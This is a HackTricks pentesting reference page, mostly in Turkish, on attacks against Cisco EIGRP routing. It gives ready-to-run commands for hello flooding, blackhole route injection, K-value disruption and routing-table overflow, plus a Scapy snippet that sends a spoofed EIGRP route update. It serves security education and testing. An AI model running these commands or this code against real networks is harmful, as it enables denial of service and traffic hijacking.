EIGRP Attacks

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

Bu, https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 adresinde açıklanan saldırıların bir özetidir. Daha fazla bilgi için inceleyin.

Fake EIGRP Neighbors Attack

  • Amaç: Yönlendirici CPU’larını EIGRP hello paketleriyle selleyerek aşırı yüklemek; bu potansiyel olarak Denial of Service (DoS) saldırısına yol açabilir.
  • Araç: helloflooding.py script.
  • Çalıştırma:
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
  • Parametreler:
  • --interface: Ağ arayüzünü belirtir, örn. eth0.
  • --as: EIGRP autonomous system numarasını tanımlar, örn. 1.
  • --subnet: Alt ağ konumunu ayarlar, örn. 10.10.100.0/24.

EIGRP Blackhole Attack

  • Amaç: Yanlış bir rota enjekte ederek ağ trafiğinin akışını bozmak; trafik olmayan bir hedefe yönlendirilerek blackhole oluşmasına yol açmak.
  • Araç: routeinject.py script.
  • Çalıştırma:
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
  • Parametreler:
  • --interface: Saldırganın sistem arayüzünü belirtir.
  • --as: EIGRP AS numarasını tanımlar.
  • --src: Saldırganın IP adresini ayarlar.
  • --dst: Hedef alt ağ IP’sini ayarlar.
  • --prefix: Hedef alt ağ IP’sinin maskesini tanımlar.

Abusing K-Values Attack

  • Amaç: Değiştirilmiş K-value’ları enjekte ederek EIGRP domain içinde sürekli kesintiler ve yeniden bağlantılar oluşturmak; böylece DoS etkisi yaratmak.
  • Araç: relationshipnightmare.py script.
  • Çalıştırma:
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
  • Parametreler:
  • --interface: Ağ arayüzünü belirtir.
  • --as: EIGRP AS numarasını tanımlar.
  • --src: Meşru bir yönlendiricinin IP adresini belirler.

Routing Table Overflow Attack

  • Amaç: Çok sayıda sahte rota ile routing tablosunu doldurarak yönlendiricinin CPU ve RAM kaynaklarını zorlamak.
  • Araç: routingtableoverflow.py script.
  • Çalıştırma:
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
  • Parametreler:
  • --interface: Ağ arayüzünü belirtir.
  • --as: EIGRP AS numarasını tanımlar.
  • --src: Saldırganın IP adresini ayarlar.

Protocol Notes Useful for Attacks

  • HELLO packets carry K-values and neighbors only form when they match. Bu, K-value mismatch/relationship disruption saldırılarının temelidir ve K-value uyuşmazlıklarının adjacency’yi neden engellediğini açıklar.
  • The PARAMETER TLV (Type 0x0001) in HELLO (and initial UPDATE) carries K-values and Hold Time, bu yüzden pasif yakalamalar segmentte kullanılan kesin değerleri ortaya çıkarır.

Scapy Packet Crafting (Route Injection / Fake Neighbors)

Scapy, EIGRPParam ve EIGRPIntRoute gibi TLV’leri içeren bir EIGRP contrib layer ile gelir; bu, route injection için UPDATE’ler oluşturmak adına yeterlidir. Örnek, davidbombal/scapy EIGRP route injection script’inden uyarlanmıştır:

from scapy.all import *
load_contrib("eigrp")

sendp(Ether()/IP(src="192.168.1.248", dst="224.0.0.10") /
EIGRP(opcode="Update", asn=100, seq=0, ack=0,
tlvlist=[EIGRPIntRoute(dst="192.168.100.0",
nexthop="192.168.1.248")]))

Aynı repo, gerçek bir EIGRP paketini sniff edip spoofed source IP ile tekrar oynatarak phantom neighbors oluşturan hızlı “fake neighbor” script’leri içerir (CPU/neighbor-table pressure için kullanışlı).

  • Scapy EIGRP contrib docs: https://scapy.readthedocs.io/en/latest/api/scapy.contrib.eigrp.html
  • Example scripts: https://github.com/davidbombal/scapy

Routopsy & NSE Yardımcıları

  • Routopsy sanal bir router attack lab (FRRouting + Scapy) kurar ve EIGRP testleri için uyarlayabileceğiniz DRP saldırılarını içerir. https://sensepost.com/blog/2020/routopsy-hacking-routing-with-routers/
  • Nmap’ın NSE’si, EIGRP paketlerinin bir alt kümesini ayrıştırma/üretme için küçük bir eigrp kütüphanesine sahiptir. https://nmap.org/nsedoc/lib/eigrp.html

Kimlik Doğrulama Keşfi

  • EIGRP named mode, HMAC-SHA-256 authentication’ı authentication mode hmac-sha-256 ... ile destekler. Etkinse, hazırlanan paketlerin doğru anahtarla doğrulanması gerekir; etkin değilse, spoofing/injection doğrulaması daha kolaydır.

Kaynaklar

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin